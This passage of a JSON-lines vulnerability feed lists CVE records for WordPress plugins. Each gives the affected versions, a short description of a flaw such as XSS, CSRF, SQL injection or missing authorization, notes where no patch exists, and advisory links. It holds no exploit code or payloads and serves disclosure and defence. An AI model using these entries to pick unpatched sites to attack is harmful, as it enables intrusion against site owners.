replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/68e0f54d-08ec-4e41-ac9b-d72cdde5a724?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/68e0f54d-08ec-4e41-ac9b-d72cdde5a724?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/where-i-was-where-i-will-be\\\/trunk\\\/system\\\/include\\\/include_user.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/where-i-was-where-i-will-be\\\/trunk\\\/system\\\/include\\\/include_user.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6168","slug":"just-custom-fields","versionImpact":"3.3.2","description":"The Just Custom Fields plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.3.2. This is due to missing or incorrect nonce validation on several AJAX function. This makes it possible for unauthenticated attackers to invoke this functionality intended for admin users via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. This enables subscribers to manage field groups, change visibility of items among other things.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9d98946e-864f-434e-8f45-85d663bbefee?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9d98946e-864f-434e-8f45-85d663bbefee?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/just-custom-fields\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/just-custom-fields\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6897","slug":"athemes-starter-sites","versionImpact":"1.0.53","description":"The aThemes Starter Sites plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.0.53 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c0d06c02-fad7-4d2f-a230-03723ba828b3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c0d06c02-fad7-4d2f-a230-03723ba828b3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/athemes-starter-sites\\\/trunk\\\/v2\\\/classes\\\/class-importer.php#L65\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/athemes-starter-sites\\\/trunk\\\/v2\\\/classes\\\/class-importer.php#L65\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/athemes-starter-sites\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/athemes-starter-sites\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3124434\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3124434\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9837","slug":"auto-date-year-month","versionImpact":"2.0.1","description":"The The AADMY \u2013 Add Auto Date Month Year Into Posts plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 2.0.1. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fb165cba-34a9-42d9-bfd5-31a290d02311?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fb165cba-34a9-42d9-bfd5-31a290d02311?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/auto-date-year-month\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/auto-date-year-month\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/auto-date-year-month\\\/trunk\\\/auto-date-year-month.php#L218\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/auto-date-year-month\\\/trunk\\\/auto-date-year-month.php#L218\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3167908\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3167908\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-44020","slug":"wp-free-ssl","versionImpact":"1.2.6","description":"Missing Authorization vulnerability in Prasad Kirpekar WP Free SSL \u2013 Free SSL Certificate for WordPress and force HTTPS allows .\n\nThis issue affects WP Free SSL \u2013 Free SSL Certificate for WordPress and force HTTPS: from n\/a through 1.2.6.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-free-ssl\\\/wordpress-wp-free-ssl-plugin-1-2-6-broken-access-control-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-free-ssl\\\/wordpress-wp-free-ssl-plugin-1-2-6-broken-access-control-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11435","slug":"salavat-counter","versionImpact":"0.9.1","description":"The salavat counter Plugin plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'page' parameter in all versions up to, and including, 0.9.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/salavat-counter\\\/trunk\\\/wp-table-class.php#L85\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/salavat-counter\\\/trunk\\\/wp-table-class.php#L85\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3ecdd962-7d85-4a60-956d-1e8a49507ab2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3ecdd962-7d85-4a60-956d-1e8a49507ab2?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11823","slug":"folder-gallery","versionImpact":"1.7.4","description":"The Folder Gallery plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'foldergallery' shortcode in all versions up to, and including, 1.7.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/folder-gallery\\\/trunk\\\/foldergallery.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/folder-gallery\\\/trunk\\\/foldergallery.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/folder-gallery\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/folder-gallery\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b4521959-416e-4ff5-96c0-bc4dbb0187b7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b4521959-416e-4ff5-96c0-bc4dbb0187b7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12384","slug":"woo-binary-mlm","versionImpact":"2.0","description":"The Binary MLM Woocommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'page\u2019 parameter in all versions up to, and including, 2.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-binary-mlm\\\/trunk\\\/includes\\\/admin\\\/payout\\\/payout-report.php#L121\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-binary-mlm\\\/trunk\\\/includes\\\/admin\\\/payout\\\/payout-report.php#L121\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-binary-mlm\\\/trunk\\\/includes\\\/admin\\\/payout\\\/payout-report.php#L44\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-binary-mlm\\\/trunk\\\/includes\\\/admin\\\/payout\\\/payout-report.php#L44\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-binary-mlm\\\/trunk\\\/includes\\\/admin\\\/register-first-user.php#L82\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-binary-mlm\\\/trunk\\\/includes\\\/admin\\\/register-first-user.php#L82\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fdf6b2ea-5a6a-481b-9431-650c895f54ef?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fdf6b2ea-5a6a-481b-9431-650c895f54ef?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3670","slug":"kiwichat","versionImpact":"6.2","description":"The KiwiChat NextClient plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018url\u2019 parameter in all versions up to, and including, 6.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kiwichat\\\/trunk\\\/public\\\/index.php#L25\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kiwichat\\\/trunk\\\/public\\\/index.php#L25\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/kiwichat\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/kiwichat\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fd6f6a2c-59d3-4091-82ac-0edf9f47ef65?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fd6f6a2c-59d3-4091-82ac-0edf9f47ef65?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11267","slug":"jsp-store-locator","versionImpact":"1.0","description":"The JSP Store Locator WordPress plugin through 1.0 does not sanitize and escape a parameter before using it in a SQL statement, allowing user with Contributor to perform SQL injection attacks.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fcbdc11a-a194-46e4-8c22-11010b98fdab\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fcbdc11a-a194-46e4-8c22-11010b98fdab\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6221","slug":"embed-bokun","versionImpact":"0.23","description":"The Embed Bokun plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018align\u2019 parameter in all versions up to, and including, 0.23 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/embed-bokun\\\/trunk\\\/embed-bokun.php#L226\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/embed-bokun\\\/trunk\\\/embed-bokun.php#L226\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/embed-bokun\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/embed-bokun\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2947a6e9-e357-4751-adfd-f9043bef75e9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2947a6e9-e357-4751-adfd-f9043bef75e9?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0418","slug":"video-central","versionImpact":"1.3.0","description":"The Video Central for WordPress plugin through 1.3.0 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/821751bb-feaf-45b8-91a9-e173cb0c05fc\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/821751bb-feaf-45b8-91a9-e173cb0c05fc\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4338","slug":"404-to-301","versionImpact":"3.0.7","description":"The 404 to 301 plugin for WordPress is vulnerable to authorization bypass due to missing capability checks on the open_redirect & save_redirect functions in versions up to, and including, 3.0.7. This makes it possible for authenticated attackers to view, create and edit redirections.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9f147107-bc5a-4a01-9979-cd9e16061f12\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9f147107-bc5a-4a01-9979-cd9e16061f12\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2546695\\\/404-to-301\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2546695\\\/404-to-301\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/05d6b27f-b1e5-4bb8-b7db-f8295a5e0d5b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/05d6b27f-b1e5-4bb8-b7db-f8295a5e0d5b?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/broken-access-control-vulnerability-fixed-in-wordpress-404-to-301-plugin\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/broken-access-control-vulnerability-fixed-in-wordpress-404-to-301-plugin\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.acunetix.com\\\/vulnerabilities\\\/web\\\/wordpress-plugin-404-to-301-redirect-log-and-notify-404-errors-security-bypass-3-0-7\\\/\",\"name\":\"https:\\\/\\\/www.acunetix.com\\\/vulnerabilities\\\/web\\\/wordpress-plugin-404-to-301-redirect-log-and-notify-404-errors-security-bypass-3-0-7\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36740","slug":"radio-buttons-for-taxonomies","versionImpact":"2.0.5","description":"The Radio Buttons for Taxonomies plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.0.5. This is due to missing or incorrect nonce validation on the save_single_term() function. This makes it possible for unauthenticated attackers to save terms via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2368215%40radio-buttons-for-taxonomies&new=2368215%40radio-buttons-for-taxonomies&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2368215%40radio-buttons-for-taxonomies&new=2368215%40radio-buttons-for-taxonomies&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/26a246c3-cf67-4566-b1e8-dc14c3c5c827?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/26a246c3-cf67-4566-b1e8-dc14c3c5c827?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3636","slug":"wedevs-project-manager","versionImpact":"2.6.4","description":"The WP Project Manager plugin for WordPress is vulnerable to privilege escalation in versions up to, and including, 2.6.4 due to insufficient restriction on the 'save_users_map_name' function. This makes it possible for authenticated attackers, with minimal permissions such as a subscriber, to modify their user role by supplying the 'usernames' parameter.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2942291\\\/wedevs-project-manager#file1792\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2942291\\\/wedevs-project-manager#file1792\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wedevs-project-manager\\\/tags\\\/2.6.3\\\/src\\\/User\\\/Controllers\\\/User_Controller.php#L158\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wedevs-project-manager\\\/tags\\\/2.6.3\\\/src\\\/User\\\/Controllers\\\/User_Controller.php#L158\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6a5e4708-db3e-483c-852f-1a487825cf92?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6a5e4708-db3e-483c-852f-1a487825cf92?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3680","slug":"enteraddons","versionImpact":"2.1.5","description":"The Enter Addons \u2013 Ultimate Template Builder for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Animation Title widget's img tag in all versions up to, and including, 2.1.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access and higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/enteraddons\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/enteraddons\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/29cc82cb-f3fd-4de5-9731-7ceb1212b0f9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/29cc82cb-f3fd-4de5-9731-7ceb1212b0f9?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6167","slug":"just-custom-fields","versionImpact":"3.3.2","description":"The Just Custom Fields plugin for WordPress is vulnerable to unauthorized access of functionality due to a missing capability check on several AJAX functions in all versions up to, and including, 3.3.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to invoke this functionality intended for admin users. This enables subscribers to manage field groups, change visibility of items among other things.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/14d71220-be60-498d-92ca-055f1c237060?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/14d71220-be60-498d-92ca-055f1c237060?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/just-custom-fields\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/just-custom-fields\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6627","slug":"happy-elementor-addons","versionImpact":"3.11.2","description":"The Happy Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's PDF View widget in all versions up to, and including, 3.11.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5bfe0a05-6bf9-4acc-bf9d-05079c3b3664?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5bfe0a05-6bf9-4acc-bf9d-05079c3b3664?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/happy-elementor-addons\\\/trunk\\\/widgets\\\/pdf-view\\\/widget.php#L587\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/happy-elementor-addons\\\/trunk\\\/widgets\\\/pdf-view\\\/widget.php#L587\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/happy-elementor-addons\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/happy-elementor-addons\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3124446\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3124446\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-43270","slug":"wp-backitup","versionImpact":"1.50","description":"Missing Authorization vulnerability in WPBackItUp Backup and Restore WordPress allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects Backup and Restore WordPress: from n\/a through 1.50.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-backitup\\\/wordpress-backup-and-restore-wordpress-plugin-1-50-unauthenticated-broken-access-control-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-backitup\\\/wordpress-backup-and-restore-wordpress-plugin-1-50-unauthenticated-broken-access-control-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11432","slug":"suevafree-essential-kit","versionImpact":"1.1.3","description":"The SuevaFree Essential Kit plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'counter' shortcode in all versions up to, and including, 1.1.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/suevafree-essential-kit\\\/trunk\\\/core\\\/shortcodes\\\/counter.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/suevafree-essential-kit\\\/trunk\\\/core\\\/shortcodes\\\/counter.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/suevafree-essential-kit\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/suevafree-essential-kit\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3c55e673-93af-403e-a690-2ae02c63541f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3c55e673-93af-403e-a690-2ae02c63541f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12293","slug":"user-role-editor","versionImpact":"4.64.3","description":"The User Role Editor plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 4.64.3. This is due to missing or incorrect nonce validation on the update_roles() function. This makes it possible for unauthenticated attackers to add or remove roles for arbitrary users, including escalating their privileges to administrator, via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/user-role-editor\\\/trunk\\\/includes\\\/classes\\\/grant-roles.php#L184\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/user-role-editor\\\/trunk\\\/includes\\\/classes\\\/grant-roles.php#L184\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/user-role-editor\\\/trunk\\\/includes\\\/classes\\\/grant-roles.php#L187\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/user-role-editor\\\/trunk\\\/includes\\\/classes\\\/grant-roles.php#L187\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3208193\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3208193\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/user-role-editor\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/user-role-editor\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6f359d02-d4ce-4045-9e79-ae0f92b84766?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6f359d02-d4ce-4045-9e79-ae0f92b84766?source=cve\",\"refs